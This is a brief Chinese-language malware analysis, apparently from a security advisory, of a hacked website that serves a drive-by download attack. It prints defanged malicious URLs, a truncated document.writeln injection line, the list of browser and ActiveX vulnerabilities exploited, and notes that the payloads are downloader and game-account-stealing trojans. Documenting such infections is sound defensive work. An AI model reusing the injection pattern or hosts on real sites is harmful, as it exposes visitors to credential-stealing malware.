该网站问题代码:
解密后获得连接:hxxp://hhj9.cn/
hxxp://hhj9.cn/恶意代码框架:
document.writeln(" hxxp://www.sll9026.cn/a2/fxx.htm网马代码框架:
该网马利用以下漏洞来传播:
MS06014漏洞
微软IE7 0day漏洞
Adobe Flash Player SWF文件漏洞
UUSee网络电视2008 UUUpgrade ActiveX Exploit
联众世界游戏GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
暴风影音播放器MPS.StormPlayer漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
注:被挂马的地址是:hxxp://202.114.88.142/showart.asp?art_id=298